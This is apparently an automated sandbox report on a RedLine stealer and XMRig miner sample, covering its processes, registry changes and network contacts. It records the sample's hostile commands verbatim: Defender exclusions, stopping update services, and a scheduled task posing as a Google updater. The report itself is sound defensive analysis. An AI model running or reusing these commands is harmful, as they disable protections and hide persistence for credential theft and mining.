Malware Analysis Report

2025-01-18 07:59

Sample ID 230812-knwesach9y
Target 3812-127-0x0000000003910000-0x0000000003944000-memory.dmp
SHA256 410f6f4b18b743455f7b1b02b7e605cfaf28b58821d5bed2b3f1d387fe13d425
Tags
redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida xmrig miner
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

410f6f4b18b743455f7b1b02b7e605cfaf28b58821d5bed2b3f1d387fe13d425

Threat Level: Known bad

The file 3812-127-0x0000000003910000-0x0000000003944000-memory.dmp was found to be: Known bad.

Malicious Activity Summary

redline logsdiller cloud (tg: @logsdillabot) evasion infostealer spyware stealer themida xmrig miner

RedLine

Redline family

xmrig

Suspicious use of NtCreateUserProcessOtherParentProcess

XMRig Miner payload

Downloads MZ/PE file

Drops file in Drivers directory

Stops running service(s)

Executes dropped EXE

Loads dropped DLL

Themida packer

Reads user/profile data of web browsers

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of SetThreadContext

Drops file in Program Files directory

Launches sc.exe

Enumerates physical storage devices

Program crash

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: LoadsDriver

Modifies data under HKEY_USERS

Modifies system certificate store

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-08-12 08:45

Signatures

Redline family

redline

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-08-12 08:45

Reported

2023-08-12 08:47

Platform

win7-20230712-en

Max time kernel

52s

Max time network

148s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1824 created 1228 N/A C:\Windows\Temp\setup.exe C:\Windows\Explorer.EXE

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mi.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cli.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1984 set thread context of 1976 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = … C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = … C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2792 wrote to memory of 548 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\mi.exe
PID 2792 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cli.exe
PID 2792 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe C:\Users\Admin\AppData\Local\Temp\cc.exe
PID 548 wrote to memory of 1824 N/A C:\Users\Admin\AppData\Local\Temp\mi.exe C:\Windows\Temp\setup.exe
PID 1984 wrote to memory of 1976 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1984 wrote to memory of 1244 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\SysWOW64\WerFault.exe
PID 2624 wrote to memory of 2668 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2624 wrote to memory of 1072 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2624 wrote to memory of 2508 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2624 wrote to memory of 1628 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 2624 wrote to memory of 2204 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\sc.exe
PID 1088 wrote to memory of 2492 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1088 wrote to memory of 2312 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1088 wrote to memory of 2920 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2224 wrote to memory of 2960 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\schtasks.exe
PID 1088 wrote to memory of 2972 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1668 wrote to memory of 1716 N/A C:\Users\Admin\AppData\Local\Temp\cc.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1716 wrote to memory of 1676 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe

"C:\Users\Admin\AppData\Local\Temp\3812-127-0x0000000003910000-0x0000000003944000-memory.exe"

C:\Users\Admin\AppData\Local\Temp\mi.exe

"C:\Users\Admin\AppData\Local\Temp\mi.exe"

C:\Users\Admin\AppData\Local\Temp\cli.exe

"C:\Users\Admin\AppData\Local\Temp\cli.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Users\Admin\AppData\Local\Temp\cc.exe

"C:\Users\Admin\AppData\Local\Temp\cc.exe"

C:\Windows\Temp\setup.exe

"C:\Windows\Temp\setup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1984 -s 108

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=10094 --headless --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95" --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User DataLHM95" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc8,0xcc,0xd0,0x9c,0xd4,0x7feefa89758,0x7feefa89768,0x7feefa89778

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=1092 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --use-angle=swiftshader-webgl --headless --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --mojo-platform-channel-handle=832 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:2

C:\Windows\system32\taskeng.exe

taskeng.exe {4D283B43-C452-426D-BE22-A40709CCA62C} S-1-5-18:NT AUTHORITY\System:Service:

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --first-renderer-process --remote-debugging-port=10094 --allow-pre-commit-input --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --mojo-platform-channel-handle=1564 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=1916 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2436 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=1932 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2588 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --headless --lang=en-US --remote-debugging-port=10094 --allow-pre-commit-input --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=2704 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --use-angle=swiftshader-webgl --use-gl=angle --headless --mojo-platform-channel-handle=2664 --field-trial-handle=1180,i,12609137504146730832,15401685145179315152,131072 --disable-features=PaintHolding /prefetch:8

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lwilj#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\schtasks.exe

"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

Network

Country Destination Domain Proto
PL 51.83.170.21:19447 tcp
US 8.8.8.8:53 transfer.sh udp
DE 144.76.136.153:443 transfer.sh tcp
US 8.8.8.8:53 apps.identrust.com udp
US 2.18.121.70:80 apps.identrust.com tcp
US 8.8.8.8:53 www.microsoft.com udp
NL 104.85.1.163:80 www.microsoft.com tcp
NL 104.85.1.163:443 www.microsoft.com tcp
US 8.8.8.8:53 ogs.google.com udp
US 8.8.8.8:53 apis.google.com udp
NL 142.250.179.206:443 ogs.google.com tcp
DE 172.217.23.206:443 apis.google.com tcp
US 8.8.8.8:53 play.google.com udp
NL 142.251.36.14:443 play.google.com tcp
US 8.8.8.8:53 youtube.com udp
NL 216.58.214.14:443 youtube.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 i.ytimg.com udp
NL 142.250.179.150:443 i.ytimg.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
NL 142.250.179.150:443 i.ytimg.com udp
US 8.8.8.8:53 yt3.ggpht.com udp
NL 142.251.36.1:443 yt3.ggpht.com tcp
US 8.8.8.8:53 stratum-eu.rplant.xyz udp
FR 141.94.192.217:17056 stratum-eu.rplant.xyz tcp

Files


Analysis: behavioral2

Detonation Overview

Submitted

2023-08-12 08:45

Reported

2023-08-12 08:47

Platform

win10v2004-20230703-en

Max time kernel

146s

Max time network

151s

Command Line

C:\Windows\Explorer.EXE

Signatures

RedLine

infostealer redline

xmrig

miner xmrig

XMRig Miner payload

miner

Description Indicator Process Target
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Windows\Temp\setup.exe N/A
File created C:\Windows\System32\drivers\etc\hosts C:\Program Files\Google\Chrome\updater.exe N/A

Stops running service(s)

evasion

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida

Description Indicator Process Target
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cc.exe N/A
N/A N/A C:\Windows\Temp\setup.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3864 set thread context of 4624 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\conhost.exe
PID 3864 set thread context of 4180 N/A C:\Program Files\Google\Chrome\updater.exe C:\Windows\explorer.exe
PID 2068 set thread context of 2920 N/A C:\Users\Admin\AppData\Local\Temp\cli.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\debug.log C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\Temp\setup.exe N/A
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\cli.exe

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
